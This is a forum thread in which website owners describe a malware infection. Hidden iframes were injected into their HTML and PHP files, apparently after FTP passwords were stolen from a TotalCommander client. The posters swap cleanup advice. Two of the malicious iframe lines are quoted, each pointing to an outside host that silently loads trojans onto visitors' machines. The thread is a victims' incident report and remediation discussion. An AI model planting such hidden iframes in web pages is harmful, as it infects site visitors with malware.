WARNING!!!WARNING!!!WARNING!!!

[Tata]

Yesterday I have found that not only my PC was infected by about 50 Trojans, but also all webpages I have built were hacked. There was inserted an IFRAME with "display:hidden" attribute in almost all HTM and PHP files. Some hacker has found a way of steeling FTP passwords.
The code

Code: Select all

<iframe src="h**p://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>

(**=tp) is mostly inserted just before the last "?>" or "<BODY>". Now I need to:

1. Change all FTP passwords
2. dowload and clear all websites - all possibly infectable files
3. change all login-psswords
4. upload them back
5. stop using TotalCommander FTP client

If you experience the same problem and have a knowledge how to make it easier, please let us know.

[Connie]

that's just plain sh..., I can image how angry you are now...

keep on!

Connie

[Tata]

That's far more than a s**t. I have found that almost each HTM, HTML, and php (even also some of SYS files) got this insertion. There were ower 5000!!! files infected on my PC in only a couple of minutes. Even during scanning occured warning about infected files.
I am wowrking on it over 6 hours already.

[Holger]

Some hacker has found a way of steeling FTP passwords

Hmm, are you sure?
Have you checked the server-ftp-logfiles?

Holger

[Tata]

Hmm, are you sure? Have you checked the server-ftp-logfiles?
Holger

That's what I have found on forums about tis danger. And I have not yet study the log-files. I am working on reinstallation of my home and office PCs since yesterday . I have read that TotalCommander FTP client has (up to version 7.4x) some holes and poor encrypted passwords. So the virus searches after wcx_ftp.ini file. If found, reads all logins saved in it and uses them to intrude and send them over to other computers. The page nserted in this hidden IFRAME seems to be full of Trojans.

[CMSimple-Styles.com]

I can recommend PrevX Secruity, it is not well known but in my opinion the best anti virus detection. Let it run on your PC it may help.

[Martin]

That sounds mean, sounds like your local machine is infected with some variant of the file infector virus "virut". Perhaps you have better luck, but it would be hard to get rid of this one, because you could not trust any of your "exe" and "scr" files. Perhaps you find an easier solution, but probably you would have to reformat your disk and reinstall your OS (without any .exe or .scr file from your "old" system) and clean up all your .html, .php and .asp files (with an editor with no html-preview) and change all your banking, email ... passwords.

I really hope you do not have to go through this long story of work and loss!

Martin

[Tata]

Actually, it is 21:25 right now and I succeeded to reformat entirely one of my 2 infected PC and I am starting from "0" now. I have no imagine what time will I spend on downloading/cleaning/uploadong all websites I have access to. Brrrrrrrrrrrrrrr

[gerepeer]

Hello,

Last night i saw that 2 of my sites were down and went to take a look, it seems that someone found out my paswords , a way into cmsimple or i did not have the rights set right but i found out that in every folder every index.php or index.html file was changed and added an iframe.

Code: Select all

<iframe src="http://a5h.ru:8080/ts/in.cgi?pepsi97" width=125 height=125 style="visibility: hidden"></iframe>

I was not able to vind out what this had to leed to but maybe someone that speaks/reads russian is able to tell me what they intended.
Fortunatly i have some backups but if results that hackers have found a way in then the community should start to worry.
Hope it`s just me and will have to studdy chmod rights again.

Gerepeer

[Tata]

Well, there is nothing in Rissuan. But I have found in some forum what's this about. The hacker has written a script that reads the file containing your TotalCommanderFTP passwords. They are abviously poor encrypted. Then it put this hidden IFRAME into any index.php, index.htm (in my case also into any HTM) file not only in your websites but also in your local PC. The visitor is then invisibly redirected to a page from which it loads a bunch of Trojans. The only way how to solve this horror is (at least I must do it):

1. download all websites to our HDD
2. with Notepad++ or PSPad search for the IFRAME code and Replace it by an empty line
3. Upload averything back
4. Delete all passwords from FTP Client

There is still the danger, that your PC is full of Trojans rewriting any EXE. But this is another story. Maybe there are already some removers on the net. But there weren't any 3 weeks ago and I needed to re-install my entire PC.
In this case:

1. Make an exact copy of all important files on a removable drive.
2. reformat your infected partitions
3. install your OS
4. install your antivirus
5. install PSPad
6. search for the IFRAME code and Replace it to an empty line in any file on your removable drive - if you find there any.
   I am sorry for you. But Enjoy the least creative work on PC.